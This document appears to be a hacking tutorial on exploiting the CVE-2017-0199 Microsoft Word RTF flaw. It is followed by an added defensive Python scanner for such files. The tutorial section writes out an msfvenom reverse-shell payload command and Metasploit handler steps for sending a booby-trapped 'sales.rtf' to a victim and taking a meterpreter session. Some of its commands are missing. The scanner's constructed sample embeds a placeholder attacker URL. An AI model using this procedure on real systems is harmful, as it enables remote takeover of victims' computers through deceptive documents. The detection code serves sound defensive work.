Microsoft Word is vulnerable to malicious RTF files. In this article we carry out a zero-day attack on MS Word 2013 using a Python script that generates a malicious .rtf file and returns a meterpreter session from the targeted system.
Exploit toolkit CVE-2017-0199 - v2.0 is a handy Python script that provides a quick and effective way to exploit the Microsoft RTF RCE. It can generate a malicious RTF file and deliver a Metasploit / meterpreter / any other payload to the victim without any complex configuration.
Let’s start!!!
Attacker: Kali Linux
Target: Windows 10 (Microsoft Word 2007 - 2013)
Open the terminal inside your Kali Linux and type the following to download this script, then change into its directory.
cd CVE-2017-0199
This command runs a Python script to generate a Rich Text Format payload, where -M is used for generating the rtf file, -w is used for the name of the rtf file, i.e. "sales.rtf", and -u for the attacker's IP address or domain name.
As you can see in the given screenshot, the above command has generated a malicious sales.rtf file. Before we send this file to our victim we need to pair it with a backdoor file so that we can establish a reverse connection from the victim.
In a new terminal use msfvenom to prepare an exe payload for the attack and type the following.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 -f exe > /root/Desktop/raj.exe
Now move raj.exe into /var/www/html.
Next, type the following command, which merges raj.exe with sales.rtf. Then share the updated rtf file with the victim and start a multi handler at the same time to catch the victim's reverse connection.
When the victim opens the sales file, which will be in doc format, the attacker receives a meterpreter session inside the Metasploit framework.
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.24
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
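As a defensive counterpart to the procedure above, here is an added example that is not part of the original post or of the CVE-2017-0199 exploit toolkit: a small Python scanner that flags RTF files carrying an auto-updating OLE link object, which is the structure a generated sales.rtf of this kind relies on. The control-word markers (\objautlink, \objupdate inside an \object group), the hex-encoded \objdata decoding, and the constructed sample files are assumptions drawn from public analysis of CVE-2017-0199 samples, not from the post; the URL in the sample is a constructed placeholder.

```python
import re
import sys

# --- Constructed samples (not real malware) -------------------------------
def hex_encode(text: str) -> str:
    """RTF \\objdata stores the embedded object as a hex string."""
    return text.encode("utf-8").hex()

# Constructed stand-in for a malicious RTF: an OLE object flagged as an
# auto-updating link whose object data points at a remote (placeholder) URL.
MALICIOUS_RTF = (
    r"{\rtf1\ansi{\object\objautlink\objupdate{\*\objdata "
    + hex_encode("http://attacker.example/doc.hta")
    + "}}}"
)

# Constructed benign RTF with no embedded objects at all.
BENIGN_RTF = r"{\rtf1\ansi Hello, this is a plain RTF document.}"

# --- Detection logic -------------------------------------------------------
# Assumption: these control words, together with \object, are the markers
# public analyses associate with CVE-2017-0199 style RTF documents.
OLE_LINK_MARKERS = (r"\objautlink", r"\objupdate")

URL_RE = re.compile(rb"https?://[^\s\"'{}\\]+", re.IGNORECASE)
# A run of at least 16 hex byte pairs: candidate \objdata payload.
HEX_RUN_RE = re.compile(rb"(?:[0-9a-fA-F]{2}){16,}")


def scan_rtf(data: bytes) -> dict:
    """Return a findings dict for one document; verdict is one of
    'not-rtf', 'clean', 'suspicious', 'malicious-link-object'."""
    findings = {
        "is_rtf": data.lstrip().startswith(b"{\\rtf"),
        "markers": [],
        "urls": [],
        "verdict": "clean",
    }
    if not findings["is_rtf"]:
        findings["verdict"] = "not-rtf"
        return findings

    for marker in OLE_LINK_MARKERS:
        if marker.encode() in data:
            findings["markers"].append(marker)

    # URLs may sit in clear text or be hidden inside hex-encoded \objdata.
    urls = {u.decode() for u in URL_RE.findall(data)}
    for run in HEX_RUN_RE.findall(data):
        try:
            decoded = bytes.fromhex(run.decode())
        except ValueError:
            continue
        urls.update(u.decode(errors="replace") for u in URL_RE.findall(decoded))
    findings["urls"] = sorted(urls)

    if b"\\object" in data and findings["markers"]:
        # Auto-updating link object: malicious if it also carries a URL,
        # otherwise still worth a manual look.
        findings["verdict"] = (
            "malicious-link-object" if findings["urls"] else "suspicious"
        )
    return findings


def scan_file(path: str) -> dict:
    """Scan an RTF document on disk (e.g. a mail attachment in quarantine)."""
    with open(path, "rb") as fh:
        return scan_rtf(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, scan_file(p))
    else:
        print("constructed malicious sample:", scan_rtf(MALICIOUS_RTF.encode()))
        print("constructed benign sample:   ", scan_rtf(BENIGN_RTF.encode()))
```

Run it with one or more file paths to scan real attachments, or without arguments to see the two constructed samples classified. The scanner is a triage aid for a mail gateway or incident responder, not a parser: it looks only for the object-link markers and the URL they carry, so a clean verdict means "no auto-updating link object found", not "safe".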